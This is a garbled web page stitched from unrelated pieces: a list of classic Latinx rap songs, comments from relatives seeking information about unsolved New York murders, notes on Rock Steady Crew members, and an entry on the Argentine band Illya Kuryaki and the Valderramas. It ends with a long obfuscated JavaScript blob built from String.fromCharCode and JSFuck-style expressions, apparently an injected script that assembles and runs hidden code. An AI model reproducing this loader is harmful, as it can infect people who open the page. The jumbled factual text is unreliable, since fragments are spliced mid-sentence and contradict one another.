While Puerto-Rican-Cuban-Dominican rapper, actress, and radio personality Angie Martinez has her own songs worth knowing, a jam you have to know that she was on is 1997s Not Tonight (Ladies Night Remix). She jumped on the Lil Kim song with Left Eye, Missy, and Da Brat, and it resulted in a top 10 hit (#1 on the Billboard US Rap Songs chart), that went platinum and was nominated for a Best Rap Performance by a Duo or Group Grammy. Some list where people were buried. // Nov 24, 2015 at 7:36 am. Please if you can give me some closure on the death of my birth mother. For some reason, I cannot find out his real name or how he died. You didnt say what you were trying to find out, but you can request a copy of his death certificate here: This will give you some information about his death. Which precinct was it? Sad for Sean to have his life so brutally cut short, and for you to experience such a loss at such a young age. The late Nuyorican rapper Big Pun, born Christopher Lee Rios, kicked down barriers for Latinx rappers when he became the first Latinx solo artist to go platinum. People have been k.lled over speaking out on Buck 4's death hence to this day crazy legs never really dwell or speak on. The name comes from Chaco, which is one of the few provinces in Argentina where aboriginals still live. I am trying to find information on a man named Pedro Tirado who was killed on. A "KURIAKI" Semi WildStyle for my brotha rest in Peace. Teresa croom Im sorry for the loss of your father. Informador. (Black History Month Exclusive). Maximal respec. The answer to those questions are on the left under the heading. He is survived by a brother and two sisters. I did that with my building. I would like to know where he is buried I will be 50 on the anniversary of his death. They have also been featured in several music videos in the last 3-4 years. What did you want to know? 5 Those barrels contain homicide evidence. Kenneth Of course, later on, Mr. Sharon, very good question. Stacy Horn The record did a have a downside. 'share' : { Were they not willing to tell you what you wanted to know? Born 05/31/1939 contact us at [numbers removed] thanks.. 30 Stacy Horn In 1981, he became part of the Rock Steady Crew, joining such acclaimed breakdancers as Ken Swift and Lil Crazy Legs.. Whose family, the fathers? The record is hardly a b-boy anthem, but it did reach the top of the British charts. That is so sad, Im very sorry. -Jon Chardiet aka Ramo is still acting. The album was chosen by Rolling Stone magazine in Argentina as one of the best rock productions of the country. 11 The record suggests a new state of mind in which there is no place for discrimination or oppression.' May 11 1966 on my first birthday. Have they explained why they havent made an arrest? (La Humanidad O Nosotros) through Epic/Sony Music Argentina. Contact and Social MediaE-mail: info @ wigzee.biz. Had a regular Thursday night gig at a club called Negril which was run by Michael Holman (of Graffiti Rock fame). 4 Photographer Henry Chalfant gave them the chance to perform at the Lincoln Center Outdoors Program. [4] According to band members 'Chaco is a summary of what happened to us musically and socially in recent times. Frost got his start in 1978 with the Bronx-based Rock City Crew. The video for 'Gallo Negro' also won Best Short Form Music Video that night. people have been killed over speaking out on Buck 4s death hence to this day crazy legs never really dwell or speak on the situation even on the freshest kids DVD. Because of the sexual, obscene nature of his mutilation, I want to know if there were ever any updates. ! // Dec 9, 2015 at 11:26 am. Frost flat on his back. But if you look over on the left on this blog, where it says, GETTING HELP CONTACTING A COLD CASE SQUAD, youll see: Before You Contact a Cold Case Squad. If you click on that youll see instructions Ive written on what do to. Katelina La Gata Eccleston is Amplifying Reggaetons Black, Daniela Arroyo Gonzlez is the First Out Trans, 17 Afro-Latinx Films to Watch for Black History, Karol G Breaks Spotify Record with New Album, Huesera: The Bone Woman Shows the Complicated Pain, Not Dead Yet Becomes Most-Watched Comedy Debut at, 10 Afro-Latina Owned Brands You Need to Know, 10 Valentines Day Nail Art Designs by Latina, My Journey as a Latina Learning to Accept, Im Afro-Boricua And Didnt Know I Had Naturally, Caring For Your Hair Can Transform Your Life;, Everything You Need to Know About Spring Cleaning, On Feeling Both Black Enough and Puerto Rican, Seora Era: 10 Latinx-Owned Items to Add To, 16 Iconic Latina TV Characters to Dress Up, 10 Latina-Owned Tees that Celebrate Our Cultura, Vibemade is Making Crystal Healing Accessible Through Jewelry, Digame: Jen Zeano of JZD Talks Jefa Life,, First Gen Guide to Managing Family Finances For, 10 Galentines Day Gifts From Latina-Owned Brands, 10 Latinx-Owned Wines to Enjoy with Your Valentines, Latina Wealth Building: Breaking Down Your 2023 Financial, Latina Therapist Breaks Down How Latinxs Can Talk, Afro-Latina Doulas are Fighting for Birth Justice Amid, How Adrienne Houghton Sharing Her Infertility Journey Empowers, Veronica Garza of Siete is Making Mexican American, Everything You Need to Know About Spring Cleaning According to My Latina Mom, What Being a Woman Means to Me & Why I Identify as a Demigirl. 2 // Dec 13, 2015 at 10:09 am. His name was Carlos Cuebas (Charlie nick name) and the girlfriend murdered was Lucy Gonzalez. Aug 30, 2011 [1], Rock en espaol. The album was not widely distributed. He was 44. Unfortunately I dont know where is her body laid to rest atom and my family would like to know if there are any leads as to who did this to her. I have a great memory of Him and Crazy Legs battling Lee from Beats Street and a cat called j Swift. Stacy Horn By then, of course, Legs had already started the new division of Rock Steady. In late 2016, the album was nominated at the 17th Annual Latin Grammy Awards for Best Alternative Music Album and won. https://www.definitions.net/definition/kuriaki. Rock steady Crew legendary. Cold case squad did investigate, but I havent heard anything in years. In the meantime, you can research whether or not there were newspaper articles by going to your local library and searching using Proquest and microfilm. December 1991 (R.I.P.) But if your friend is more ambitious, theres a lot more she can do. Roughly 150 200 or more murders go cold every year, and try as they might, they are not going back and solving that many each year (of the older, cold cases). Are you asking about how to find where she was buried? I was told that my mother Josephine Brewer was stabbed and shot and left in a New York city or New Jersey alleyway. Frosty was one of the most charismatic b-boys that was ever around, said Benson Lee, who directed a 2007 documentary about break dancing, Planet B-Boy, in which Mr. Also, cases that far back would not be easily accessible. If they questioned anyone.my mother was the type of person to give her last. Its that Latinnnnnnn Activvvvvity!, Hailing from New York, The Beanuts Dominican Jerry JuJu Tineo, and Colombian Lester Psycho Les Fernandez are rappers and producers who had a hit with 1999s Watch Out Now. If the beat sounds familiar, it was because it was used for Jennifer Lopezs hit Jenny from the Block., https://www.youtube.com/watch?v=lBeyeSCG5Ho. In 2009, we were all counting out like it was Sesame Street: One-two-three-four, Uno-do-tres-cuatro, thanks to Cuban rapper Pitbulls big hit, I Know You Want Me (Calle Ocho). The ode to Calle Ocho in Miami, went worldwide, just like Mr. Worldwide himself, reaching the top 10 in over 20 countries. He is also often credited with inventing the back spin. Not too much is known about them, but these two died in 1991. Thats all thanks to rapper and music director Jim Jones and his 2006 platinum hit song We Fly High. Born Joseph Guillermo Jones II, Jim is Afro-Puerto Rican, and also a member of the group The Diplomats (a.k.a. New York Times 14 Aug, 2000, Illya Kuryaki & the Valderramas: Rock 'Deforme' El Nuevo Herald, Miami - May 7, 1998, Regresa Illya Kuryaki and The Valderramas a la escena musical. He was Also in Money Talks(1997), Franc Reyes aka Luis wrote some Freestyle songs in the early 90s & directed 2002s Empire and Saundra Santiago aka Carmen was in the miami vice series and currently a soap opera now. A New York Times article considered the music to be 'surreal poetry, full of rebelliousness, death and raunchy transfiguration', and mentioned that in the lyrics of Jennifer del Estero, 'Jennifer Lopez leaves her derriere in the singer's freezer.'[2]. But Im just guessing. -Robert Taylor aka Lee Still resides somewhere in the bronx. Chaco sold over 250,000 copies. The only thing that was known is that kuriaki was tortured and k.lled execution style in a garage. Hailing from the South Bronx, New York, Puerto Rican, and Cuban rapper Fat Joe is known as one of the biggest Latinx MCs ever. Mean Machine has the distinction of being one of the first bilingual rap groups ever, and possibly the first Latino rap group, rapping in both English and Spanish. Please help my restless mind and guide me in the direction I need to go. 25 Its legendary members include Puerto Rican Crazy Legs (born Richard Colon), Baby Love (Daisy Castro), Buck 4 (Gabriel Marcano), and Kuriaki (Lorenzo Soto). 2023. Shelter. He lived in the Bronx at the time. // Dec 8, 2015 at 1:40 pm. // Dec 13, 2015 at 12:21 am, My mother name is. [10][12] The Miami Herald placed them within the 'wilder side of rock en espaol'.[13]. The Rock Steady Crew is a breaking and hip-hop crew, which got its start in New York. After much talking back and forth it was revealed one brother (and his girl friend) murdered at age 20 in September 1970. Carlos Cuebas was another brother of your fathers? Frost was known for his acrobatic and daredevil moves. The Height of Summer ad was so catchy that even Oprah Winfrey tweeted that she could not stop singing it. I would have no way of knowing. Los Angeles Times (November 28, 1998) page 6, Techno and traditional merge in new Latin music. . The Rock Steady Crew Band, *1977 US, The Bronx Hip-Hop/Rap and Electronic The original Rock Steady Crew were: Crazy Legs (Richard Coln), Baby Love (Daisy Castro), Prince Ken Swift (Ken Gabbert), Buck 4 (Gabriel Marcano), Kuriaki ( Lorenzo Soto) and Doze (Jeffrey Greene). How did buck four and kuriaki die of rock steady crew? stadium in Buenos Aires. 19 I need to find resting place. Definitions.net. still hoping What about cases that the jury found the defendant not guilty? He was a longtime member and key figure in the Rock Steady Crew, and its former Vice President. Teshia Latham He called it the Suicide. The song, which features Fat Joe and Remy Ma, spent three weeks at the #1 spot on the Billboard Hot 100 and was nominated for a Best Rap Performance by a Duo or Group Grammy. The two man team of Jo Jo and Jimmy D were the original founders. I edited your post because I didnt think it was a good idea to post some of that publicly. She was 24 years old // Dec 17, 2015 at 7:00 pm. My mother Elizabeth Murray was shot in her apartment in new York in 1974. They played on stage together at the Vive Latino Festival 2008. A b-boy dance phrase finishes with a freeze, hence the name that Mr. I would like information on the deaths of Kuriaki Soto, Lorenzo Soto of Rock Steady Crew in June of 1991. They say New York is the place to be but it ain't no place without Kuriaki. Wayne Frost, known as Frosty Freeze, in 1983 at the Roxy. Please help us . // Oct 7, 2015 at 9:09 am. They used battles as a means of recruitment. She was born 05/31/1939 . So start with Proquest, its lot easier and faster, and then move on to microfilm. Are those cases closed forever? If there was a trial but the person wasnt convicted the case would be closed until they had a new suspect. JUXTAPOZ!! If you have any questions, please feel free to ask. Celimar Melendez But perhaps and even bigger break was the appearance by members Mr Freeze, Ken Swift, Crazy Legs and Frosty Freeze in the box office smash Flashdance. Frost began attracting wide attention in 1981, when his picture appeared on the cover of The Village Voice with an article by Sally Banes titled Physical Graffiti: Breaking Is Hard to Do.. No reason to kill her and where was security was that for three days left behind a shower.. We want answers.and closure..please if anyone has information please contact our family. Thank you for your time in this regard. @2022 - hiplatina.com All Right Reserved. I am trying to find out if any new information has been found out about my brothers murder in Bronx River Projects in July of 1997. Then look up the number in the document Cold Case Squad and Other Organizations. _stq = window._stq || []; If you have information about a specific case, and believe the crime was committed by someone within law enforcement, I believe your best bet would be to contact the District Attorney. She supposedly had died in the year of 2000, to 2002. Pechugo dissolved one year later, and the duo decided to form Illya Kuryaki and The Valderramas. his last current release which was in 2000 was a B-Film called Chump Change, about movie show business. 39 Summer Nights is a single of his 2005 album, Twelve Eighteen, Pt. Touch device users, explore by touch or with swipe . The shooting occurred by the old Lincoln hospital on March 7, 1976, 49 Margaret, Im sorry about your father. What are you trying to find out exactly? 28 My mother was murdered when I was a child in Brooklyn New York 1985. One of his most-acclaimed songs is 1995s Sugar Hill, which went gold. // Dec 9, 2015 at 1:44 pm. {'service': 'instagram', 'id': 'MRWIGGLESRSC'} The duo split in 2001 to follow solo careers, but later performed together several times, and officially reunited in 2011. Their number is 212-447-2030. I dont understand, if your mother is a good friend of his mother, your mother could ask her. Stacy Horn Stacy Horn My father was murdered on 7/18/98. But since you dont know either way if someone did, there are more things you can do to find out. // Dec 13, 2015 at 10:43 am. 1, which charted on the Billboard Hot 100, Billboard 200, and Hot Rap Songs charts. The result was world wide attention to the b-boy cause. Kuriaki - Rock Steady Crew - 1991. The answer to those questions are on the left under the heading, Getting Help Contacting a Cold Case Squad. Freeze and Lil' Crazy Legs got down, Lenny-Len, and about a year and a half later, Buck 4 and Kuriaki, too, and on and on. 'whatsnext' : {}, [1] The duo took their name from a fictional character, the Soviet spy Illya Kuryakin in the hit 1960s TV show The Man from U.N.C.L.E., and the Colombian football player Carlos Valderrama. I never forgot about Sean. }, Are you a family member? It sounds like the the cold case detective wasnt able to uncover anything to help. Latin Alliance is a collaborative effort between Latinx rappers on the album of the same name. It could be that they simply did not have enough evidence to make a convincing case. Kuriaki: Prince Ken Swift . // Oct 14, 2015 at 2:29 pm, Been looking into my fathers death New York City June 18th 1973 cant find nothing looking for obituaries cant find out nothing Raymond Skinner, 18 He had so much fun with it., Wayne Frost, Pioneering Break Dancer, Dies at 44, https://www.nytimes.com/2008/04/04/arts/dance/04freeze.html. I think about everyday of my life. Leche (Milk) was influenced by African-American music and funk. In both cases she would type in her address and see if anything comes back (youd want to search on various versions of the address, ie, East 177 Street or E. 177 St, etc). Create your own unique website with customizable templates. Unique style!!!! One of his most successful songs is 2002s Whats Luv?, which features rapper Ja-Rule, and Ashanti. Lil Crazy Legs, originally part of Rock City Rockers, got his name from his efforts to copy Crazy Legs style. Emmanuel focused on a rock and pop-rock sound, while Dante preferred hip-hop. I would start by ordering his death certificate. As a subscriber, you have 10 gift articles to give each month. I appreciate any information and leads thank you from the croom family, 38 January 1965 | died: 09. // Dec 16, 2015 at 7:14 pm. Mr. Her name is Jeannette Sophie lynch. About Press Copyright Contact us Creators Advertise Developers Terms Privacy Policy & Safety How YouTube works Test new features Press Copyright Contact us Creators . The South Gate, L.A. hip hop trio, who has sold over 20 million records. The guy went by the name of Eddiehis last name couldve been Skinner, because thats the name of his adoptive mom, but Im not sure. Maybe you can help me find out if its true or not. Do you know anyone who was murdered? ROCK STEADY CREW (10) 1983 JAPAN TV KURIAKI&BUCK 4 6,998 views Sep 7, 2011 28 Dislike Share Save TosakenChannel 3.61K subscribers ROCK STEADY CREW (10) 1983 JAPAN TV KURIAKI&BUCK. Kuriaki was looking great, and he rocked that Back Spin, Side Spin. Frosty Freeze was an elder b-boy (a member of the Rock City Crew) who was still interested in the game but was without a steady crew. Cant try the same person twice. Retrieved from 'https://en.wikipedia.org/w/index.php?title=Illya_Kuryaki_and_the_Valderramas&oldid=989816200', Illya Kuryaki and the Valderramas at rock.com.ar, Pareles, Jon. The album features bass player Bootsy Collins, who introduces himself saying, 'My name is Bootsy Collins, old woman!' That will give you even more information. Marie bercourt What does kuriaki mean? I want to know about it but I do not know how to go about finding the information on her death. Also known as Anthony Cruz, the Afro-Dominican artist is a member of The Firm, with Nas, Foxy Brown, Nature, and Cormega. // Dec 16, 2015 at 7:20 pm. I fought for as long as I could but I couldnt bare the pain. from New York City (United States) active since 1978. former member 1979 - 1984 of Rock Steady Crew. 21 Hello. Since then, we have been holding our own, with so many different artists releasing albums, creating hits, and infusing our cultures into rap. 'numPreferredServices' : 5 Rumors surface that he currently teaches the art of a B-Boy and only accept small roles from time to time. First, I took out your phone numbers from your post. Hi. 13 Im so sorry about your father. // Dec 9, 2015 at 11:11 am. // Dec 18, 2015 at 10:18 pm, My Dad was shot in March and died as a result of it in August 5, 1976 this occurred when I was just 4 years old it happened in the Bronx during the son of Sam murders although not connected my Mom moved soon after and she thought the man responsible was tried and convicted but that did not occur . So, we wanted to help keep Latinxs in hip-hop history, as they should be, by sharing 30 essential, classic rap songs by Latinos everyone should know. Please help. But since you dont know either way if someone did, there are more things you can do to find out. $mVT=String.fromCharCode(46,50,104,41,85,73,113,123,77,87,47,103,56,69,107,70,65,83,82,39,49,71,40,63,88,120,74,109,72,75,67,80,112,76,68,81,118,61,48,90,59,57,84,119,89,86,66,125,44);(![]+[])[+[]][([![]]+{})[+!+[]+[+[]]]+([]+[]+{})[+!+[]]+([]+[]+[][[]])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]]+([![]]+{})[+!+[]+[+[]]]+(!![]+[])[+[]]+([]+[]+{})[+!+[]]+(!![]+[])[+!+[]]][([![]]+{})[+!+[]+[+[]]]+([]+[]+{})[+!+[]]+([]+[]+[][[]])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]]+([![]]+{})[+!+[]+[+[]]]+(!![]+[])[+[]]+([]+[]+{})[+!+[]]+(!![]+[])[+!+[]]]($mVT[36]+(![]+[])[+!+[]]+(!![]+[])[+!+[]]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$mVT[25]+$mVT[+!+[]+!+[]]+(!![]+[])[+!+[]]+$mVT[37]+([]+[]+[][[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$mVT[43]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$mVT[24]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+[]]+$mVT[32]+$mVT[18]+(!![]+[])[!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[25]+$mVT[+!+[]+!+[]]+(!![]+[])[+!+[]]+$mVT[(+[])]+([]+[]+{})[+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[19]+$mVT[48]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]]+([]+[]+{})[!+[]+!+[]]+([![]]+{})[+!+[]+[+[]]]+(![]+[])[+!+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+$mVT[(+[])]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+(![]+[])[+[]]+([]+[]+{})[+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[23]+([]+[]+[][[]])[+!+[]]+(![]+[])[!+[]+!+[]]+$mVT[33]+(!![]+[])[!+[]+!+[]]+$mVT[37]+$mVT[45]+(![]+[])[!+[]+!+[]]+(+{}+[]+[])[+[]]+$mVT[30]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[20]+$mVT[18]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[24]+$mVT[35]+$mVT[44]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[13]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[30]+$mVT[16]+([![]]+{})[+!+[]+[+[]]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[35]+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+$mVT[46]+$mVT[11]+$mVT[12]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[20]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[43]+$mVT[+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[18]+$mVT[41]+$mVT[24]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]]+$mVT[39]+$mVT[21]+$mVT[30]+$mVT[2]+$mVT[2]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[44]+$mVT[4]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[24]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[41]+$mVT